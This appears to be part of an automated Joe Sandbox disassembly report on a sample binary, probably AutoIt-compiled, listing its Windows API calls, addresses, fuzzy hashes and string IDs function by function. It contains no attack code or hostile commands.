                                                                                                                        • Instruction ID: 1d46738a5caa0df2c6070a912cfb021ff006fb29a83d3ca040b11be9f383c231
                                                                                                                        • Opcode Fuzzy Hash: 9d308b88815d4ecd82f040c5131814dccbc4733c884eef1b353212df88f7ac15
                                                                                                                        • Instruction Fuzzy Hash: 60415031900219AFDB11EFA5DC449DEBFB9FF04344F049066E519B3261DB70AA49CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • CoInitialize.OLE32 ref: 00EAB298
                                                                                                                        • CoUninitialize.OLE32 ref: 00EAB2A3
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00EDD8FC,?), ref: 00EAB303
                                                                                                                        • IIDFromString.OLE32(?,?), ref: 00EAB376
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00EAB410
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00EAB471
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                        • Opcode ID: fd6ee8d56a1f039a3dcccfd14266139f97bfd759824825fc6f02668b0ea67dd8
                                                                                                                        • Instruction ID: 777394ba4222146c012fcead6266b337804d9c80e0dec95411118a9ba311f009
                                                                                                                        • Opcode Fuzzy Hash: fd6ee8d56a1f039a3dcccfd14266139f97bfd759824825fc6f02668b0ea67dd8
                                                                                                                        • Instruction Fuzzy Hash: 1D619D706083019FCB10DF54D884B6EBBE8EF4A714F04581AF995AB292D7B0FD48CB92
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00EA86F5
                                                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00EA873A
                                                                                                                        • gethostbyname.WSOCK32(?), ref: 00EA8746
                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00EA8754
                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EA87C4
                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EA87DA
                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EA884F
                                                                                                                        • WSACleanup.WSOCK32 ref: 00EA8855
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                        • String ID: Ping
                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EB9C68
                                                                                                                        • CreateMenu.USER32 ref: 00EB9C83
                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00EB9C92
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB9D1F
                                                                                                                        • IsMenu.USER32(?), ref: 00EB9D35
                                                                                                                        • CreatePopupMenu.USER32 ref: 00EB9D3F
                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EB9D70
                                                                                                                        • DrawMenuBar.USER32 ref: 00EB9D7E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 176399719-4108050209
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E9EC1E
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E9EC94
                                                                                                                        • GetLastError.KERNEL32 ref: 00E9EC9E
                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00E9ED0B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E8C782
                                                                                                                        • GetDlgCtrlID.USER32 ref: 00E8C78D
                                                                                                                        • GetParent.USER32 ref: 00E8C7A9
                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E8C7AC
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00E8C7B5
                                                                                                                        • GetParent.USER32(?), ref: 00E8C7D1
                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E8C7D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E8C869
                                                                                                                        • GetDlgCtrlID.USER32 ref: 00E8C874
                                                                                                                        • GetParent.USER32 ref: 00E8C890
                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E8C893
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00E8C89C
                                                                                                                        • GetParent.USER32(?), ref: 00E8C8B8
                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E8C8BB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32 ref: 00E8C8D9
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00E8C8EE
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8C900
                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E8C97B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00EAB777
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00EAB7A4
                                                                                                                        • CoUninitialize.OLE32 ref: 00EAB7AE
                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00EAB8AE
                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EAB9DB
                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00EABA0F
                                                                                                                        • CoGetObject.OLE32(?,00000000,00EDD91C,?), ref: 00EABA32
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00EABA45
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EABAC5
                                                                                                                        • VariantClear.OLEAUT32(00EDD91C), ref: 00EABAD5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2395222682-0
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00E9B137
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafeVartype
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1725837607-0
                                                                                                                        APIs
                                                                                                                        • __swprintf.LIBCMT ref: 00E97226
                                                                                                                        • __swprintf.LIBCMT ref: 00E97233
                                                                                                                          • Part of subcall function 00E7234B: __woutput_l.LIBCMT ref: 00E723A4
                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E9725D
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00E97269
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00E97276
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00E97296
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00E972A8
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00E972B7
                                                                                                                        • LockResource.KERNEL32(?), ref: 00E972C3
                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E97322
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1433390588-0
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?), ref: 00ECEC32
                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00ECEC49
                                                                                                                        • GetWindowDC.USER32(?), ref: 00ECEC55
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00ECEC64
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ECEC76
                                                                                                                        • GetSysColor.USER32(00000005), ref: 00ECEC94
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 272304278-0
                                                                                                                        APIs
                                                                                                                        • EnumChildWindows.USER32(?,00E8DD46), ref: 00E8DC86
                                                                                                                        Similarity
                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00E6C2D2
                                                                                                                          • Part of subcall function 00E6C697: GetClientRect.USER32(?,?), ref: 00E6C6C0
                                                                                                                          • Part of subcall function 00E6C697: GetWindowRect.USER32(?,?), ref: 00E6C701
                                                                                                                          • Part of subcall function 00E6C697: ScreenToClient.USER32(?,?), ref: 00E6C729
                                                                                                                        • GetDC.USER32 ref: 00ECE006
                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ECE019
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00ECE027
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00ECE03C
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ECE044
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ECE0CF
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                          • Part of subcall function 00E6B736: GetCursorPos.USER32(000000FF), ref: 00E6B749
                                                                                                                          • Part of subcall function 00E6B736: ScreenToClient.USER32(00000000,000000FF), ref: 00E6B766
                                                                                                                          • Part of subcall function 00E6B736: GetAsyncKeyState.USER32(00000001), ref: 00E6B78B
                                                                                                                          • Part of subcall function 00E6B736: GetAsyncKeyState.USER32(00000002), ref: 00E6B799
                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00EBEB0E
                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00EBEB14
                                                                                                                        • ReleaseCapture.USER32 ref: 00EBEB1A
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00EBEBC2
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EBEBD5
                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00EBECAE
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EA4C5E
                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EA4C8A
                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EA4CCC
                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EA4CE1
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA4CEE
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EA4D1E
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00EA4D65
                                                                                                                          • Part of subcall function 00EA56A9: GetLastError.KERNEL32(?,?,00EA4A2B,00000000,00000000,00000001), ref: 00EA56BE
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1241431887-3916222277
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EEDBF0), ref: 00EABBA1
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EEDBF0), ref: 00EABBD5
                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EABD33
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00EABD5D
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,00EEDBF0), ref: 00EABEAD
                                                                                                                        • ProgIDFromCLSID.OLE32(?,?,?,00EEDBF0), ref: 00EABEF7
                                                                                                                        • CoTaskMemFree.OLE32(?,?,?,00EEDBF0), ref: 00EABF14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 793797124-0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EB23E6
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EB2579
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EB259D
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EB25DD
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EB25FF
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EB2760
                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EB2792
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EB27C1
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EB2838
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4090791747-0
                                                                                                                        APIs
                                                                                                                        • select.WSOCK32 ref: 00EA9B38
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9B45
                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00EA9B6F
                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EA9B90
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9B9F
                                                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00EA9C51
                                                                                                                        • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00EEDBF0), ref: 00EA9C0C
                                                                                                                          • Part of subcall function 00E8E0F5: _strlen.LIBCMT ref: 00E8E0FF
                                                                                                                          • Part of subcall function 00E8E0F5: _memmove.LIBCMT ref: 00E8E121
                                                                                                                        • _strlen.LIBCMT ref: 00EA9CA7
                                                                                                                        • _memmove.LIBCMT ref: 00EA9D10
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3637404534-0
                                                                                                                        APIs
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EBB204
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 634782764-0
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ECE9EA
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ECEA0B
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ECEA20
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ECEA3D
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ECEA64
                                                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E6A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00ECEA6F
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ECEA8C
                                                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E6A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00ECEA97
                                                                                                                        Similarity
                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268354404-0
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00ECE9A0,00000004,00000000,00000000), ref: 00E6F737
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00ECE9A0,00000004,00000000,00000000), ref: 00E6F77E
                                                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00ECE9A0,00000004,00000000,00000000), ref: 00ECEB55
                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00ECE9A0,00000004,00000000,00000000), ref: 00ECEBC1
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                          • Part of subcall function 00E97C0C: GetFileAttributesW.KERNEL32(?,00E96A7B), ref: 00E97C0D
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E97ED2
                                                                                                                        • _wcscmp.LIBCMT ref: 00E97EEA
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E97F03
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8E158
                                                                                                                          • Part of subcall function 00E8E138: GetCurrentThreadId.KERNEL32 ref: 00E8E15F
                                                                                                                          • Part of subcall function 00E8E138: AttachThreadInput.USER32(00000000,?,00E8CDFB,?,00000001), ref: 00E8E166
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E8CE06
                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E8CE23
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E8CE26
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E8CE2F
                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E8CE4D
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E8CE50
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E8CE59
                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E8CE70
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E8CE73
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8BFFE
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C005
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E8BC1D,00000B00,?,?), ref: 00E8C01A
